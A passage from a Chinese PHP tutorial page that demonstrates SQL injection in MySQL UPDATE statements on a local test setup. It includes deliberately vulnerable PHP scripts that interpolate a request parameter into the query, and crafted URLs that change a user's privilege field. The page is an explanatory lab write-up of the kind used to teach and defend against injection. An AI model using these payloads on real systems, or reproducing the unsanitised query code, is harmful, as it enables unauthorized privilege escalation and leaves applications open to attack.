程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
 程式師世界 >> 編程語言 >> 網頁編程 >> PHP編程 >> 關於PHP編程 >> UPDATE注射(mysql+php)的兩個模式

UPDATE注射(mysql+php)的兩個模式

編輯:關於PHP編程

一.測試環境:

  OS: Windowsxp sp2

  php: php 4.3.10 (

  mysql 4.1.9

  apache 1.3.33 

  二.測試數據庫結構:

-----start---

-- 數據庫: `test`

-- 

-- --------------------------------------------------------

-- 

-- 表的結構 `userinfo`

-- 

CREATE TABLE `userinfo` (

`groudid` varchar(12) NOT NULL default ’1’,

`user` varchar(12) NOT NULL default ’heige’,

`pass` varchar(122) NOT NULL default ’123456’

) ENGINE=MyISAM DEFAULT CHARSET=latin1;

-- 

-- 導出表中的數據 `userinfo`

-- 

INSERT INTO `userinfo` VALUES (’2’, ’heige’, ’123456’);

------end-------

三.測試模式:

  1,變量沒有帶’’或""[MOD1]


//test1.php Mod1

$servername = "localhost";

$dbusername = "root";

$dbpassword = "";

$dbname = "test";

mysql_connect($servername,$dbusername,$dbpassword) or die ("數據庫連接失敗");

$sql = "update userinfo set pass=$p where user=’heige’";//<--$P沒有使用單引號

$result = mysql_db_query($dbname, $sql);

$userinfo = mysql_fetch_array($result);

echo "

SQL Query:$sql

";

?>



  腳本裡只是修改user=’heige’的pass,如果groudid表示用戶的權限等級,我們的目的就是通過構造$p 來達

  到修改groupid的目的:

  那麼我們提交:http://127.0.0.1/test1.php?p=123456,groudid=1

  在mysql裡查詢: mysql> select * from userinfo;

+---------+-------+--------+

| groudid | user  | pass   |

+---------+-------+--------+

| 1       | heige | 123456 |

+---------+-------+--------+

1 row in set (0.01 sec)

用戶heige的groudid又2改為1了 :)

  所以我們可以得到沒有’’或"" update的注射是可以成功的,這個就是我們的模式1。

  2,變量帶’’或""[MOD2]


//test2.php

$servername = "localhost";

$dbusername = "root";

$dbpassword = "";

$dbname = "test";

mysql_connect($servername,$dbusername,$dbpassword) or die ("數據庫連接失敗");

$sql = "update userinfo set pass=’$p’ where user=’heige’";//<--$P使用單引號

$result = mysql_db_query($dbname, $sql);

$userinfo = mysql_fetch_array($result);

echo "

SQL Query:$sql

";

?>

  為了關閉’我們構造$p應該為123456’,groudid=’2 提交:

  http://127.0.0.1/test2.php?p=123456’,groudid=’1 在gpc=on的情況下’變成了’

  提交的語句變成:SQL Query:update userinfo set pass=’123456’,groudid=’1’ where user=’heige’

mysql查詢: mysql> select * from userinfo;

+---------+-------+--------------------+

| groudid | user  | pass               |

+---------+-------+--------------------+

| 2       | heige | 123456’,groudid=’1 |

+---------+-------+--------------------+

1 row in set (0.00 sec)

  groudid並沒有被修改。那麼在變量被’’或""時 就完全沒有被注射呢?不是 下面我們看模式2:
//test3.php Mod2

$servername = "localhost";

$dbusername = "root";

$dbpassword = "";

  1. 上一頁:
  2. 下一頁: